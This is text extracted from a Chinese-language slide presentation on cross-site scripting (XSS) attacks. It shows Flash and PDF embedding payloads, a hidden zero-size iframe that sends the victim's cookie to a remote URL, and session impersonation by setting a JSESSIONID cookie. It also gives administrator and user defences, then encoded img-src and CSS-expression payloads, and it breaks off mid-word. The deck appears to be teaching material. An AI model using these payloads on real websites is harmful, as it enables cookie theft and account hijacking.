XSS(CrossSiteScripting)攻击手法展示.ppt

FLASH的攻擊程式碼 1. onClipEvent (load) { 2.getURL(javascript:alert(document.cookie); ); 3. } FLASH植入指令 與PDF一樣，有兩種植入方式，一種是利用embed標籤，另一種則利用object標籤。其語法如下 embed src=/flash_xss.swf quality=high pluginspage=/go/getflashplayer type=application/x-shockwave-flash wmode=transparent width=600 height=390 allowscriptaccess=always ?? object type=application/x-shockwave-flash data=/flash_xss.swf width=1 height=1 param name=movie value=/flash_xss.swf param name=allowscriptaccess value=always FLASH攻擊成功畫面-使用IE植入 FLASH攻擊成功畫面-FIREFOX 竊取使用者COOKIE 利用iframe語法並將框線及大小改為0，讓使用者無法察覺已被偷取Cookie。 範例iframe frameborder=0 height=0 width=0 src=javascript:void(document.location=http://???/rent/default20.aspx?c=+document.cookie)/iframe 查詢Cookie的指令 javascript:alert(document.cookie) 假冒使用者登入 修改攻擊者的cookie假冒使用者已經登入。 範例：javascript:void(document.cookie=“JSESSIONID=????8883EC830FF2A9FCCE3D737782E”) 防禦方式 對於網站管理者： 對所有用戶提交內容進行可靠的輸入驗證，包括對URL、查詢關鍵字、POST數據等，僅接受指定長度範圍內、採用適當格式、採用所預期的字符的內容提交，對其他的一律過濾。 去除掉任何對遠程內容的引用如CSS與Javascript 缺點：將會降低網站的功能性，使用者只能輸入少量的限定字串，降低與使用者的互動性。 防禦方式(續) 使用者方面： 使用較高安全性的瀏覽器，並隨時更新。 不要隨便點任意連結。 將Adobe browser plug-in設定為不讓瀏覽器自動開啟PDF檔。 使用第三方開發的瀏覽器外掛， 如:Firefox的NoScript，來去除非使用者同意執行的JavaScript。 保持良好的上網習慣 img src=#106;#97;#118;#97;#115;#99;#114;#105;#112;#116;#58;#97;#108;#101;#114;#116;#40;#39;#88;#83;#83;#39;#41;#59;#32; img src=#x6a;#x61;#x76;#x61;#x73;#x63;#x72;#x69;#x70;#x74;#x3a;#x61;#x6c;#x65;#x72;#x74;#x28;#x27;#x58;#x53;#x53;#x27;#x29;#x3b;#x20; * body?{background-image:?url(javascript:alert(XSS));}?? background-image:?expression(alert(XSS)); * body?{background-image:?ex/**/pression(alert(XSS));} * (1)的「/*」被視為是註解的開始，(2)的「\」將(3)的「*」給省略掉了，所以一直到(4)的「*/」才被視為是註解的結束。(5)的@import在註解外，而(6)的「/*」與「*/」被視為一對註解的開始與結束。 * (1)的「/*」被視為是註解的開始，(2)的「\」被視為在註解中所以沒有作用，(3)的「*/」被視為註解的結束，(4)的「/*」被視為第二個註解的開始，(5)的「@import」被視為註解內，而最後(6)的「*/」為結束註解，於是「@import」不會被執行。 * object data=/armorize_cht3.pdf#scrollbar=0toolbar=0statusbar=0messages=0navpanes=0 type=application/pdf width=100% height=70%/object * ob